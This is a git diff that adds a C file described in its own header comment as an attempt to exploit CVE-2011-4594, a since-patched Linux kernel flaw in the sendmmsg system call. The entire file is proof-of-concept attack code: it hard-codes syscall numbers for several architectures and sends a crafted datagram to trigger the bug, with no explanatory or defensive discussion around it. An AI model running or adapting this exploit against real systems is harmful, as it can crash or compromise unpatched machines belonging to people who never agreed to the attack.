1 files changed, 78 insertions, 0 deletions

diff --git a/splicket.c b/splicket.c
new file mode 100644
index 0000000..e939041
--- /dev/null
+++ b/splicket.c
@@ -0,0 +1,78 @@
+/*
+ * Socket Splickt
+ * by zx2c4
+ * 
+ * This is an attempt to exploit CVE-2011-4594.
+ * 
+ * It was patched in bc909d9ddbf7778371e36a651d6e4194b1cc7d4c.
+ * 
+ */
+
+
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <signal.h>
+#include <netdb.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <net/if.h>
+#include <net/ethernet.h>
+#include <linux/if_packet.h>
+#include <asm/unistd.h>
+#include <errno.h>
+
+#ifndef __NR_sendmmsg
+#if defined( __PPC__)
+#define __NR_sendmmsg   349
+#elif defined(__x86_64__)
+#define __NR_sendmmsg   307
+#elif defined(__i386__)
+#define __NR_sendmmsg   345
+#else
+#error __NR_sendmmsg not defined
+#endif
+#endif
+
+struct reimp_mmsghdr {
+        struct msghdr msg_hdr;
+        unsigned int msg_len;
+};
+static inline int reimp_sendmmsg(int fd, struct reimp_mmsghdr *mmsg, unsigned int vlen, unsigned int flags)
+{
+        return syscall(__NR_sendmmsg, fd, mmsg, vlen, flags, NULL);
+}
+
+int main(int argc, char *argv[])
+{
+	const int fd = socket(AF_INET, SOCK_DGRAM, 0);
+	char buf[10];
+	struct iovec iovec[1];
+	struct reimp_mmsghdr datagram;
+	struct sockaddr_in addr;
+
+	memset(buf, 0, sizeof(buf));
+	memset(iovec, 0, sizeof(iovec));
+	memset(&datagram, 0, sizeof(datagram));
+	memset(&addr, 0, sizeof(addr));
+	addr.sin_family = AF_INET;
+	addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+	addr.sin_port = htons(10000);
+	iovec[0].iov_base = buf;
+	iovec[0].iov_len = sizeof(buf);
+	datagram.msg_hdr.msg_iov = iovec;
+	datagram.msg_hdr.msg_iovlen = 1;
+	datagram.msg_hdr.msg_name = &addr;
+	datagram.msg_hdr.msg_namelen = sizeof(addr);
+
+	errno = 0;
+	if (reimp_sendmmsg(fd, &datagram, 1, 0) < 0) {
+		perror("reimp_sendmmsg");
+		exit(1);
+	}
+	
+	return 0;
+}
\ No newline at end of file